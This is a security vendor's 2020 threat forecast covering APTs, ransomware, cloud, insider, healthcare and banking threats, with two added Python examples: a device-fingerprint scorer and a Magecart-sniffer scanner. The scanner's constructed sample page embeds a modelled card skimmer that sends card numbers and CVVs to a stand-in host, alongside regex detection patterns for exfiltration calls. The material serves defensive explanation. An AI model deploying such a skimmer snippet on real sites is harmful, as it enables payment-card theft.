Advanced threat predictions for 2020
Nothing is more difficult than making predictions. Rather than trying to gaze into a crystal ball, we will be making educated guesses based on what has happened during the last 12 months, to see where we can see trends that might be exploited in the near future.
This is what we think might happen in the coming months, based on the knowledge of experts in this field and our observation of APT attacks – since APT threat actors have historically been the center of innovation.
The next level of false flag attacks
The use of false flags has become an important element in the playbook of several APT groups. In the past, this has generally involved trying to deflect attention away from those responsible for the attack – for instance, the usage of Russian words in Lazarus group malware, or Romanian words by WildNeutron. In one notable case – the Olympic Destroyer attack – the Hades APT group sought to go further than just muddying the waters of attribution by forging elements of the attack to make it seem like the work of a different threat actor. We believe that this will develop further, with threat actors seeking not only to avoid attribution but to actively lay the blame on someone else.
For instance, this could include the usage of established backdoors by other unrelated APT actors, the theft and re-use of code (the recently published case of Turla reusing code from an unknown Iranian group, outlined by the UK NCSC and NSA comes to mind) or deliberately leaking source code so that other groups adopt it and muddy the waters further.
On top of all that, we should consider how actors continually use commodity malware, scripts, publicly available security tools or administrator software during their attacks and for lateral movement, making attribution increasingly difficult. Mixing a couple of false flags into this equation, where security researchers are hungry for any small clue, might be enough to divert authorship to someone else.
From ransomware to targeted ransomware
In the last two years we’ve seen a decline in numbers of all-purpose widespread ransomware attacks as cybercriminals have become more targeted in their use of this type of malware – focusing on organizations that are likely to make substantial payments in order to recover their data. We are calling this technique ‘targeted ransomware’. Throughout the year, we recorded several cases where attackers used targeted ransomware, and we think that a likely future development will be more aggressive attempts to extort money. A potential twist might be that, instead of making files unrecoverable, threat actors will threaten to publish data that they have stolen from the victim company.
In addition to targeted ransomware, it is inevitable that the cybercriminals will also attempt to diversify their attacks to include other types of devices besides PCs or servers. For instance, ransomware in consumer products, such as smart TVs, smart watches, smart cars/houses/cities. As more devices become connected to the internet, cybercriminals will also be looking for ways to monetize their access to these devices. Ransomware is, unfortunately, the most effective tool for extracting a financial profit from the victims.
New online banking and payments attack vectors
A new potential attack vector for cybercriminals could open up with the new banking regulations that have recently come into full effect across the EU. The revised Payment Services Directive (PSD2) lays down regulatory requirements for companies that provide payment services, including the use of personal data by new fintech companies that are not part of the established banking community. Security of online, including mobile, payments is a key aspect of the legislation. Nevertheless, as banks will be required to open their infrastructure and data to third parties who wish to provide services to bank customers, it is likely that attackers will seek to abuse these new mechanisms with new fraudulent schemes.
More infrastructure attacks and attacks against non-PC targets
Determined threat actors have, for some time, been extending their toolsets beyond Windows, and even beyond PC systems: VPNFilter and Slingshot, for example, targeted networking hardware. The benefit to an attacker, of course, is that once they have compromised such devices, it gives them flexibility. They could opt for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In our threat predictions for 2019, we considered the possibility of ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker. In June, it was revealed that hackers had infiltrated the networks of at least 10 cellular telcos around the world, and had remained hidden for years. In some cases, it seems they had been able to deploy their own VPN services on telco infrastructure.
The convergence of real and cyber worlds brought about by the profusion of IoT devices offers growing opportunities for attackers; and it’s evident that threat actors are aware of the potential. This year it was reported that unknown attackers stole 500MB of data from NASA’s Jet Propulsion Laboratory using a Raspberry Pi. In December last year, the UK’s Gatwick airport was brought to a standstill for fear of a possible collision after at least one drone was sighted above one of the runways. While it’s unclear whether this was the result of a hobbyist drone owner or a deliberate attempt at disruption, the fact remains that part of the country’s critical infrastructure was brought to a standstill because of the use of a drone. The number of such attacks will undoubtedly grow.
In recent years, we have seen a number of high-profile attacks on critical infrastructure facilities and these have typically been aligned to wider geo-political objectives. While most infections in industrial facilities continue to be from ‘mainstream’ malware, this fact itself highlights just how vulnerable these facilities can be. While targeted attacks on critical infrastructure facilities are unlikely ever to become a mainstream criminal activity, we do expect to see the number grow in the future. Geo-political conflicts are now played out in a world where the physical and cyber are increasingly converging; and, as we have observed before, such attacks offer governments a form of retaliation that lies between diplomacy and war.
Increased attacks in regions that lie along the trade routes between Asia and Europe
Clausewitz’s dictum, “War is merely the continuation of politics by other means”, can be extended to include cyberconflict, with cyberattacks reflecting wider real-world tensions and conflicts. We have seen numerous examples. Consider, for example, accusations of Russian interference in US elections and fears about a possible reboot of this in the run-up to the 2020 elections. We’ve seen it in the ‘naming-and-shaming’ of alleged Chinese hackers in US indictments. The widespread use of mobile implants to surveil ‘persons of interest’ is another example.
There are several ways this could play out. They include a growth in political espionage as governments seek to secure their interests at home and abroad. This could mean monitoring the activities of ‘undesirable’ individuals or movements within the country, as well as those of potential opponents abroad. It is likely to extend also to technological espionage in situations of potential or real economic crisis and resulting instability. This could result in new attacks in regions that lie along trade routes between Asia and Europe, including Turkey, Eastern and Southern Europe and East Africa.
It’s quite possible that we will see changes to legislation and policy, as governments look to define more clearly what is and what isn’t allowed. On the one hand, this could be used as a way to establish plausible deniability and thereby avoid sanctions if the finger of suspicion is pointed at one state by another. On the other hand, it could enable more aggressive use of technology, as several justice departments seem keen to open the door to different kinds of ‘lawful interception’ to collect evidence on computers. One likely response from criminal groups will be greater use of encryption and the Darknet to conceal their operations.
Increasing sophistication of attack methods
It is hard to know exactly how advanced the top-class attackers really are and what kind of resources they have at their disposal. Of course, every year we learn a bit more: for instance, a few years ago we observed an apparently endless supply of zero-days for resourceful attackers who were ready to pay for them. This year we observed several examples, but probably the most interesting is the one involving at least 14 exploits for iOS during the last two years, as exposed by Google in August.
The new isolation methods implemented for Microsoft Word and other software traditionally targeted in spear-phishing campaigns might have a significant impact on malware delivery methods, forcing less sophisticated actors to change the way they spread malware.
We believe it is likely that additional interception capabilities, similar to the Quantum insert attacks described a few years ago, are already being used; and hopefully we will be able to discover some of them.
It also seems likely that attackers will exfiltrate data with non-conventional methods, such as using signaling data or Wi-Fi/4G, especially when using physical implants (something we also believe is probably being overlooked). In a similar vein, we believe more attackers will use DoH (DNS over HTTPS) in the future to conceal their activities and make discovery more difficult. Finally, it is possible that during the coming months we will start discovering more UEFI malware and infections as our ability to see such systems is slowly improving.
Use of supply chains will continue to be one of the most difficult delivery methods to address. It is likely that attackers will continue to expand this method through manipulated software containers, for example, and abuse of packages and libraries.
A change of focus towards mobile attacks
During the last 10 years, an important transition has taken place: the main storage for our digital lives has moved from the PC to mobiles. Some threat actors were quick to notice this and begin focusing on developing attack tools for mobiles. While we have constantly been predicting a huge increase in the number of attacks against mobiles, the observations from the field haven’t always reflected this inferred evolution. However, the lack of observations of a phenomenon doesn’t necessarily imply that it’s not happening.
We have already discussed how an attacker exploited at least 14 iOS vulnerabilities, in exploit chains that included zero-days, to target certain minorities in Asia. We also saw recently how Facebook sued the Israeli company NSO for allegedly misusing its servers (to deploy malware to intercept user data). We also saw how Android zero-click, full persistence exploits are now more expensive (according to Zerodium’s price list) than those for the iPhone.
All of this is telling us how much money attackers are investing in developing these technologies. It is clear to all of them how nearly everyone has a phone in his/her pocket and how valuable the information on those devices is. Every year we see new movements in this direction. We also see how complicated it might be for security researchers to obtain more technical details about attacks on such platforms, given the lack of visibility or accessibility.
There are no good reasons to think this will stop any time soon. However, due to the increased attention given to this subject by the security community, we believe the number of attacks being identified and analyzed in detail will also increase.
The abuse of personal information: from deep fakes to DNA leaks
We have previously discussed how data leaks help attackers to craft more convincing social engineering attacks. Not every adversary has a complete profile of potential victims to abuse, which makes the increasing amount of leaked data very valuable. This is also true for ‘less targeted’ attacks like the ransomware cases we have already discussed.
In a world where logged data continues to grow, we can see the danger in what could be considered especially sensitive leaks, for instance when it comes to biometric data. Also, widely discussed deepfakes are providing the technology to make such attacks a possibility, especially when combining this with less obvious attack vectors such as video and audio. We should not forget how this can be automated, and how AI can help with the profiling and creation of such scams.
Yes, all this sounds futuristic, but it is very similar to some of the techniques discussed for driving election advertisements through social media. This technology is already in use and it is just a matter of time before some attackers take advantage of it.
The future holds so many possibilities that there are likely to be things that are not included in our predictions. The extent and complexity of the environments in which attacks play out offer so many possibilities. In addition, no single threat research team has complete visibility of the operations of APT threat actors. We will continue to try and anticipate the activities of APT groups and understand the methods they employ, while providing insights into their campaigns and the impact they have.
Corporate security prediction 2020
Moving to the cloud
The popularity of cloud services is growing, and threat actors are here to exploit the trend.
We are observing more and more cases where our customers’ infrastructure is partially or entirely located in the cloud – cloud migration has been the dominant trend of the past couple of years. This is resulting in a blurring of infrastructure boundaries. In 2020, we expect the following trends to emerge.
It will become more difficult for attackers to separate the resources of the targeted company from those of cloud providers. At the same time, it will be much more difficult for companies to detect an attack on their resources in the initial stages.
The transition to the cloud has blurred the boundaries of company infrastructures. As a result, it is becoming very difficult to target an organization’s resources in a precise manner: an attacker who wants to hit a particular company must first work out which of a cloud provider’s shared resources belong to that company. Conducting a targeted attack will therefore become harder, and threat actors will either become more sophisticated or fall back on volume, hitting cloud resources opportunistically rather than by plan. On the other hand, it will also be difficult for a company to identify targeted attacks at an early stage and separate them from the overall mass of attacks on the cloud provider.
Investigating incidents will become more complex and in some cases less effective.
Those who plan to deploy cloud infrastructure in 2020 need to talk in advance with their provider about a communications plan in the event of an incident, because time is of the essence when it comes to security incidents. It’s very important to agree what data is logged, how long it is retained, and how to back it up. Lack of clarity on such information can lead to complications or even make successful incident investigation impossible. We note, however, that awareness of cloud infrastructure security is not growing as fast as the popularity of cloud services, so we expect to see an increase in the complexity of investigating incidents as well as a decrease in the effectiveness of incident response.
It’s also worth noting that when companies pass on their data to a cloud provider for storage or processing, they also need to consider whether the provider possesses the necessary level of cybersecurity. Even then, it is hard to be absolutely certain that the services they are paying for are really secure, as it requires a level of expertise in information security that not all technical officers possess.
Criminals will migrate to the cloud and forge ahead.
The increase in the availability of cloud services will allow not just companies but also attackers to deploy infrastructure in the cloud. This will reduce the complexity of an attack and, consequently, will increase their number and frequency. This could potentially affect the reputation of the cloud services themselves, as their resources will be used in large-scale malicious activity. To avoid this, providers will have to consider reviewing their security procedures and change their service policies and infrastructure.
Insider threats
The good news is that we are observing an increase in the overall level of security of businesses and organizations. In this regard, direct attacks on infrastructure (for example, penetrating the external perimeter through the exploitation of vulnerabilities) are becoming much more expensive, requiring more and more skill and time from the attacker. As a result, we predict:
Growth in the number of attacks using social engineering methods.
In particular, this means phishing attacks on company employees. As the human factor remains a weak link in security, the focus on social engineering will increase as other types of attacks become more difficult to carry out.
Growth of the insider market.
Due to the increasing cost of other attack vectors, attackers will be willing to offer large amounts of money to insiders. The price for insiders varies from region to region and depends on the target’s position in the company, the company itself, its local rating, the type and complexity of insider service that is requested, the type of data that is exfiltrated and the level of security at the company.
There are a number of ways such insiders can be recruited:
By simply posting an offer on forums and offering a reward for certain information.
The attackers may disguise their actions so that employees don’t realize they are acting illegally, disclosing personal information or engaging in insider activity. For example, the potential victims may be offered a simple job on the side to provide information, while being reassured that the data is not sensitive, though it may in fact relate to the amount of funds in a bank client’s personal account or the phone number of an intended target.
Blackmailing. We also expect to see increased demand for the services of groups engaged in corporate cyber-blackmail and, as a consequence, an increase in their activity.
Cyber-blackmailing groups that collect compromising info on company employees (e.g. evidence of crimes, personal records and personal data such as sexual preferences) for the purpose of blackmail will become more active too in the corporate sector. Usually this happens in the following way: the threat actors take a pool of leaked emails and passwords, find those that are of interest to them and exfiltrate compromising data that is later used for blackmail or cyberespionage. The stronger the cultural specifics and regional regulations, the faster and more effective the attackers’ leverage is. As a result, attacks on users in order to obtain compromising data are predicted to increase.
Cybersecurity of connected healthcare 2020: Overview and predictions
More than two years after the infamous WannaCry ransomware crippled medical facilities and other organizations worldwide, the healthcare sector seems to be learning its lesson, as the number of attacked medical devices – doctors’ computers, medical servers and equipment – decreased globally in 2019.
Our statistics showed that 30% of computers and devices in medical organizations were infected in 2017; this number dropped to 28% in 2018, and for the current year we have detected almost a third fewer attacks (19%).
As much as we want to believe everybody has woken up to the dangers of attacks like WannaCry, we still witnessed a number of ransomware attacks against healthcare facilities in several countries. There are two key reasons for such cyberattacks: a lack of attention to the risks of digitalization and a lack of cybersecurity awareness among staff at medical facilities.
Our conclusions about the human factor in cybersecurity are drawn from survey results. Kaspersky conducted a survey among healthcare sector employees in the US and Canada that revealed nearly a third of all respondents (32%) had never received any cybersecurity training from their workplace.
One-in-10 employees in management positions also admitted that they were unaware of a cybersecurity policy in their organization.
Another serious issue is the lack of proper security standards implemented in medical IoT devices. Throughout the year security researchers identified a number of vulnerabilities in different medical equipment. Hopefully, drawing attention to this subject will make manufacturers collaborate with the security community and contribute more to the creation of a safer environment in the world of smart medicine.
Forecast 2020
Interest in medical records on the dark web will grow. From our research into underground forums we see that such records are sometimes even more expensive than credit card information. It also opens up potentially new methods of fraud: armed with someone’s medical details it’s easier to scam the patient or his/her relatives.
Access to internal patient info makes it possible not only to steal but to modify records. This can lead to targeted attacks on individuals in order to mess up diagnostics. Diagnostic mistakes are the number one reason for patient deaths in the medical field according to statistics (even ahead of poorly qualified medical personnel).
The number of attacks on medical facility devices in countries that are just starting the digitalization process in the field of medical services will grow significantly next year. We expect to see the emergence of targeted ransomware attacks against hospitals in developing countries. Medical institutions are turning into industrial infrastructures. Loss of access to internal data (e.g. digital patient records) or internal resources (e.g. connected medical equipment inside a hospital) can halt patient diagnostics and even disrupt emergency aid.
Growing numbers of targeted attacks against medical research institutes and pharmaceutical companies conducting innovative research. Medical research is extremely expensive and some APT groups that are specialized in intellectual property theft will attack such institutions more frequently in 2020.
Thankfully, we’ve never seen attacks on implanted medical devices (e.g. neuro-stimulators) in the wild. But the fact that there are numerous security vulnerabilities in such devices means that it’s just a matter of time. The creation of centralized networks of wearable and implanted medical devices (as in the case of cardio stimulators) will lead to the emergence of a new threat: a single point of entry to attack all the patients using such devices.
Cyberthreats to financial institutions 2020: Overview and predictions
Key events 2019
Large-scale anti-fraud bypass: Genesis digital fingerprints market uncovered
Multi-factor authentication (MFA) and biometric challenges
Targeted attack groups specializing in financial institutions: splitting and globalization
ATM malware becomes more targeted
Card info theft and reuse: magecarting everywhere and battle of POS malware families in Latin America
Large-scale anti-fraud bypass: Genesis digital fingerprints market uncovered
During the last few years, cybercriminals have invested a lot in methods to bypass anti-fraud systems, because now it’s not enough just to steal the login, password and PII – they now need a digital fingerprint to bypass anti-fraud systems in order to extract money from the bank. During 2019, we identified a huge underground market called Genesis, which sells digital fingerprints of online banking users from around the globe.
From an anti-fraud system’s perspective, a user’s digital identity is a digital fingerprint: a combination of system attributes that are unique to each device, plus the personal behavioral attributes of the user. It includes the IP address (external and local), screen information (screen resolution, window size), firmware version, operating system version, installed browser plugins, time zone, device ID, battery information, fonts, etc. A single browsing device can expose over 100 such attributes. The second part of a digital identity is behavioral analysis.
As criminals are continuously looking for ways to defeat anti-fraud safeguards, they try to substitute the system’s real fingerprint with a fake one, or with existing ones stolen from someone else’s PC.
The Genesis Store is an online invitation-only private cybercriminal market for stolen digital fingerprints. At the time of our research, it offered more than 60,000 stolen bot profiles. The profiles include browser fingerprints, website user logins and passwords, cookies, credit card information, etc. By loading such a fingerprint into the Tenebris Linken Sphere browser, criminals are able to masquerade as legitimate online banking users from any region, country, state, city, etc.
This type of attack shows that criminals have in-depth knowledge of how internal banking systems work and it’s a real challenge to protect against such attacks. The best option is to always use multi-factor authentication.
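To make the mechanism concrete, here is an added example (not code from the article, and not any real anti-fraud product) of the device half of such a check: a weighted comparison of the attributes listed above between the device enrolled for an account and the device at login. The attribute names, weights, threshold and all profiles are constructed assumptions. It shows the two outcomes that matter: a fraudster on their own machine scores far below the threshold, while a Genesis-style replay of the victim’s full profile scores a perfect match, which is why the device check alone is not enough.

```python
"""Device-fingerprint scoring of the kind an anti-fraud system applies at login.

Added illustration: this is not code from the article and not a real
anti-fraud product. Attribute names, weights and the threshold are assumptions,
and every profile below is constructed rather than real user data.
"""
import hashlib
import json

# Attributes collected from the browser, with assumed weights: stable hardware
# and rendering traits weigh more than traits that change routinely.
WEIGHTS = {
    "user_agent": 2.0,
    "os_version": 2.0,
    "screen": 1.5,          # "WxHxdepth"
    "timezone": 1.5,
    "language": 1.0,
    "plugins": 1.5,         # hash of the plugin list
    "fonts_hash": 1.5,      # hash of the enumerated fonts
    "canvas_hash": 2.0,     # hash of a rendered canvas probe
    "webgl_renderer": 2.0,
    "device_memory": 1.0,
    "local_ip": 1.0,        # leaked via WebRTC
}
TOTAL_WEIGHT = sum(WEIGHTS.values())


def fingerprint_id(attrs):
    """Stable device identifier: SHA-256 over the canonical JSON of the weighted attributes."""
    subset = {k: attrs.get(k) for k in WEIGHTS}
    return hashlib.sha256(json.dumps(subset, sort_keys=True).encode()).hexdigest()


def match_score(enrolled, observed):
    """Weighted fraction (0..1) of attributes that agree between enrolled and observed device."""
    agreed = sum(w for k, w in WEIGHTS.items() if enrolled.get(k) == observed.get(k))
    return agreed / TOTAL_WEIGHT


def mismatches(enrolled, observed):
    """Names of the attributes that differ, for the analyst's case notes."""
    return sorted(k for k in WEIGHTS if enrolled.get(k) != observed.get(k))


def assess_login(enrolled, observed, threshold=0.85):
    """Decide whether the device alone is trusted ('allow') or a second factor is required ('step_up')."""
    score = round(match_score(enrolled, observed), 3)
    verdict = "allow" if score >= threshold else "step_up"
    return verdict, score, mismatches(enrolled, observed)


# Constructed profiles (not real users).
VICTIM = {
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/70.0",
    "os_version": "Windows 10 1903",
    "screen": "1920x1080x24",
    "timezone": "Europe/Berlin",
    "language": "de-DE",
    "plugins": "4f2a9c",
    "fonts_hash": "b7e1d0",
    "canvas_hash": "91ac3e",
    "webgl_renderer": "ANGLE (Intel UHD 620)",
    "device_memory": 8,
    "local_ip": "192.168.178.23",
}
# The victim after a routine browser update: only the user agent changed.
VICTIM_UPDATED_BROWSER = {**VICTIM, "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/71.0"}
# A fraudster on their own machine, holding only the stolen password.
FRAUDSTER_OWN_DEVICE = {
    "user_agent": "Mozilla/5.0 (X11; Linux x86_64) Chrome/78.0",
    "os_version": "Ubuntu 18.04",
    "screen": "1366x768x24",
    "timezone": "America/Sao_Paulo",
    "language": "pt-BR",
    "plugins": "c0ffee",
    "fonts_hash": "0dd5ea",
    "canvas_hash": "7a7a7a",
    "webgl_renderer": "Mesa Intel HD",
    "device_memory": 8,
    "local_ip": "10.0.0.5",
}
# A fraudster replaying the victim's stolen profile in an anti-detect browser:
# every attribute is copied, so the device check alone cannot tell them apart.
FRAUDSTER_REPLAYED_PROFILE = dict(VICTIM)


def demo():
    """Run the four scenarios and return their verdicts."""
    return {
        "same_device": assess_login(VICTIM, VICTIM),
        "updated_browser": assess_login(VICTIM, VICTIM_UPDATED_BROWSER),
        "own_device": assess_login(VICTIM, FRAUDSTER_OWN_DEVICE),
        "replayed_profile": assess_login(VICTIM, FRAUDSTER_REPLAYED_PROFILE),
    }


if __name__ == "__main__":
    for case, (verdict, score, diff) in demo().items():
        print(f"{case:18} {verdict:8} score={score:.3f} mismatches={diff}")
```

The tolerant threshold is deliberate: a browser update must not lock the real customer out, so a single changed attribute still passes. The price of that tolerance is that a byte-identical stolen profile, replayed together with the victim’s cookies, passes as well; only a factor the attacker does not hold (a second factor, or the behavioral half of the identity) separates the two cases.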
Multi-factor authentication (MFA) and biometric challenges
MFA is a challenge for cybercriminals. When MFA is used, they have to come up with techniques to bypass it. The most common methods used during the last year were:
Exploiting vulnerabilities and flaws in the configuration of the system. For example, criminals were able to find and exploit several flaws in remote banking systems to bypass OTPs (one time passcodes);
Using social engineering, a common method among Russian-speaking cybercriminals and in APAC region;
SIM swapping, which is especially popular in regions like Latin America and Africa. In fact, despite SMS no longer being considered a secure second factor, low operational costs mean it’s still the most popular method used by providers.
In theory, biometrics should solve a lot of problems associated with two-factor authentication, but practice has shown that it may not be so simple. Over the past year, several cases have been identified that indicate biometrics technology is still far from perfect.
Firstly, there are quite a few implementation problems. For example, Google Pixel 4 does not check if your eyes are open during the unlocking process using facial characteristics. Another example is the possibility of bypassing fingerprint authentication using the sensor under the screen on smartphones made by various manufacturers, including popular brands such as Samsung.
There is another trick that has been exploited in Latin America: a visual capturing attack. Cybercriminals installed rogue CCTV cameras and used them to record the PINs people used to unlock their phones. Such a simple technique is still very effective for both types of victims: those who use biometrics and those who prefer PINs to fingerprints or facial recognition. This is because, when a device is dusty or greasy (and the same applies to a user’s fingers), the best way to unlock a phone is to use a PIN.
Secondly, there were several high-profile leaks of biometric databases. The most notorious was the leak of the Biostar 2 database that included the biometric data of over 1 million people. The company stored unencrypted data, including names, passwords, home addresses, email addresses and, most importantly, unencrypted biometric data that included fingerprints and facial recognition patterns as well as the actual photos of faces. A similar leak occurred at a US Customs and Border Protection contractor, where biometric information of over 100,000 people was leaked.
There have already been several proof-of-concept attacks that use biometric data to bypass security controls, but those attacks could still be countered with system updates. With these latest leaks, on the other hand, this won’t work because your biometric data cannot be changed – it stays with you forever.
The cases mentioned above, combined with the high-quality research carried out by cybercriminals to obtain a complete digital fingerprint of a user in order to bypass anti-fraud systems, suggest that relying solely on biometric data will not solve the current problems. Today’s implementations need a lot of effort and more research to make them truly secure.
Targeted attack groups specializing in financial institutions: splitting and globalization
FIN7
In 2018, Europol and the US Department of Justice announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. Some believed that the arrest would have an impact on the group’s operations, but this does not seem to have been the case. In fact, the number of groups operating under the umbrella of CobaltGoblin and FIN7 has grown: there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.
The first operating under this umbrella is the now-notorious FIN7 that specializes in attacking various companies to get access to financial data or their PoS infrastructure. It relies on the Griffon JScript backdoor and Cobalt/Meterpreter and, in more recent attacks, PowerShell Empire.
The second is CobaltGoblin/Carbanak/EmpireMonkey. It uses the same toolkit, techniques and a similar infrastructure, but targets only financial institutions and associated software and service providers.
The final group is the newly discovered CopyPaste group, which has targeted financial entities and companies in one African country – leading us to believe that this group is associated with cyber-mercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It’s possible that the operators of this cluster of activity were influenced by open-source publications and don’t actually have any ties to FIN7.
All of these groups benefit greatly from unpatched systems in corporate environments and continue to use effective spear-phishing campaigns in conjunction with well-known Microsoft Office exploits generated by their exploitation framework. So far, the groups have not used any zero-day exploits. FIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they have proved to be quite successful.
In the middle of 2019, FIN7 fell silent, but returned at the end of the year with new attacks and new tools. We suspect that the silent period is connected to their infrastructure shutdown that occurred after closing a bulletproof hosting company in Eastern Europe.
In contrast to FIN7, the activity of the Cobalt Goblin group was stable throughout the year, which once again shows that these groups are related but operate on their own: their toolsets and TTPs are very similar, yet they act independently, and only occasionally can we spot overlaps in infrastructure. At the same time, the intensity of attacks is slightly lower than in 2018. Cobalt Goblin’s tactics have remained the same: they use documents with exploits that first load a small downloader and then a Cobalt beacon. The main targets also remain the same: small banks in a variety of countries. Perhaps we have detected a lower number of attacks due to diversification, because some indicators suggest the group could also be engaging in JS sniffing (MageCarting) in order to obtain data about payment cards directly from websites.
JS sniffing was extremely popular throughout the year and we found thousands of e-commerce websites infected with these scripts. The injected scripts act in different ways and the infrastructure of the attackers is very different, which suggests that this type of fraud is used by at least a dozen cybercrime groups.
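As an added illustration (not code from the article or from Kaspersky), the following Python script triages a checkout page for the indicators a JS sniffer leaves behind: a script that reads the card fields and sends their values to a host the merchant does not control, or an external script loaded from a host that is not on the merchant’s own list. The allow-listed hosts, the regular expressions and the sample checkout page are constructed assumptions; the inline “sniffer” is a model of the form-hooking pattern, not a real sample.

```python
"""Static triage of a checkout page for JS-sniffer (Magecart-style) indicators.

Added illustration, not code from the article. The first-party hosts, the
regular expressions and the sample page are assumptions constructed for this
example; a real sniffer is usually obfuscated and may hide in a compromised
third-party script, so treat hits as leads for manual review, not proof.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}   # assumed first-party origins

CARD_FIELD_RE = re.compile(r"card[_-]?number|cc[_-]?num|cvv|cvc|expir", re.I)
EXFIL_RE = re.compile(r"\bfetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\s*\(|\.src\s*=", re.I)
ENCODING_RE = re.compile(r"\b(?:btoa|atob|eval|unescape)\s*\(|String\.fromCharCode", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


class ScriptCollector(HTMLParser):
    """Collects every <script> as (src attribute or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None


def foreign_hosts(text):
    """Hostnames of absolute URLs in the text that are not first-party."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(text)}
    return {h for h in hosts if h and h not in ALLOWED_HOSTS}


def scan_page(html):
    """Return a list of findings, one per suspicious <script>, in document order."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for idx, (src, body) in enumerate(parser.scripts):
        if src:  # external script: a relative src is first-party, anything else must be allow-listed
            host = urlparse(src).hostname
            if host and host not in ALLOWED_HOSTS:
                findings.append({"script": idx, "severity": "medium",
                                 "reason": f"external script from unlisted host {host}"})
            continue
        targets = foreign_hosts(body)
        sniffs = bool(CARD_FIELD_RE.search(body)) and bool(EXFIL_RE.search(body)) and bool(targets)
        reasons = []
        if sniffs:
            reasons.append(f"reads card fields and sends data to {sorted(targets)}")
        if ENCODING_RE.search(body):
            reasons.append("encodes or decodes payload at runtime")
        if reasons:
            findings.append({"script": idx, "severity": "high" if sniffs else "low",
                             "reason": "; ".join(reasons)})
    return findings


# Constructed checkout page: a relative first-party script, an allow-listed CDN,
# an injected inline sniffer modelled on the form-hooking pattern, and an unlisted external script.
SAMPLE_CHECKOUT = """<html><body>
<form id="payment"><input name="cardnumber"><input name="cvv"><input name="expiry"></form>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop.example/analytics.js"></script>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = {n: document.querySelector('[name=cardnumber]').value,
           c: document.querySelector('[name=cvv]').value};
  new Image().src = 'https://stats-collector.example/i.gif?d=' + btoa(JSON.stringify(d));
});
</script>
<script src="https://metrics-cdn.example/m.js"></script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_CHECKOUT):
        print(finding)
```

Run it against HTML saved from the live checkout (the page as the customer receives it, not the template in the repository, since the injection may happen at the web server or at a third party). Static heuristics like these are a starting point; the structural defences are a Content Security Policy that restricts connect-src and img-src to known hosts, Subresource Integrity on third-party scripts, and change monitoring of every script the checkout page loads.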
The Silence group actively expanded its operations into different countries throughout the year. We detected attacks in regions where we have never seen them before, for example in Southeast Asia and Latin America. This indicates that they have either expanded their operations themselves or started cooperating with other cybercrime groups already established in those regions. However, when we look at the development of their main backdoor, we see that their technology has barely changed over the last two years.
ATM malware becomes more targeted
When it came to ATM malware, we discovered a number of completely new families in 2019. The most notable were ATMJadi and ATMDtrack.
ATMJadi is an interesting one because it doesn’t use the standard XFS, JXFS or CSC libraries. Instead, it uses the proprietary Java classes of the victim bank’s own ATM software, meaning the malware will only work on a small subset of ATMs. This makes the malware very targeted: it only works against one specific bank.
This is reminiscent of the FASTCash case from 2018, when criminals targeted servers running AIX OS. With a decrease in the number of general-purpose cashout tools, we can say that ATM malware is becoming rarer and more targeted.
Another interesting piece of malware is ATMDtrack, which was first detected in financial institutions in India and is programmed to cash out ATMs. Using the Kaspersky Targeted Attack Attribution Engine (KTAE), we were able to attribute these attacks to the Lazarus group, which supports our prediction from 2018 that there would be “more nation-state sponsored attacks against financial organizations”. Moreover, similar spyware has been found in research centers, with the Lazarus APT group using almost identical tools to steal research results from scientific institutes.
Card info theft and reuse
During the year we saw a lot of malware targeting end users and businesses looking for credit card data. In Brazil, in particular, we saw a couple of malware families fighting it out between themselves to maintain control of infected devices. HydraPOS and ShieldPOS were very active during the year, with new versions that included a lot of new targets; Prilex, meanwhile, reduced its activities in the second half of the year.
ShieldPOS has been active since at least 2017 and, after starting out as malware only, it has finally evolved into a MaaS (malware-as-a-service). This shows there’s great interest among Latin American cybercriminals in running their own “business” of stealing credit cards. HydraPOS has been mostly focused on stealing money from POS systems in restaurants, parking payment machines and various retail stores.
Compared to ShieldPOS, HydraPOS is an older campaign from an actor we named Maggler, which has been in the credit card business since at least 2016. The main difference is that, unlike ShieldPOS, it doesn’t work as MaaS. In both cases, we suspect that the initial infection vector is a carefully prepared social engineering campaign involving telephone calls to the victims.
Analysis of forecasts for 2019
Before giving our forecasts for 2020, let’s see how accurate our forecasts for 2019 turned out to be:
The emergence of new groups due to the fragmentation of Cobalt/Carbanak and FIN7: new groups and new geography.
Yes, we saw CobaltGoblin activity, FIN7 activity, CopyPaste activity and an overlap of IoCs with the Silence group.
The first attacks through the theft and use of biometric data.
Yes, hacks of various biometric databases appeared regularly throughout the year. We also revealed a digital fingerprint market where criminals can buy digital fingerprints, which include, among other things, behavioral data (a component of biometrics).
The emergence of new local groups attacking financial institutions in the Indo-Pakistan region, Southeast Asia and Central Europe.
No. It turned out that well-known groups such as Lazarus, Silence and CobaltGoblin took their place and very actively attacked financial institutions in these regions.
Continuation of supply-chain attacks: attacks on small companies that provide their services to financial institutions around the world.
Yes.
Traditional cybercrime will focus on the easiest targets and bypass anti-fraud solutions: replacement of POS attacks with attacks on systems accepting online payments (Magecarting/JS skimming).
Yes, the number of groups that started carrying out attacks on online payment systems grew constantly over the year. We detected thousands of websites that were affected by JS skimming.
The cybersecurity systems of financial institutions will be bypassed using physical devices connected to the internal network.
Yes, and not only financial institutions: even the aerospace industry, namely NASA, has suffered from this type of attack.
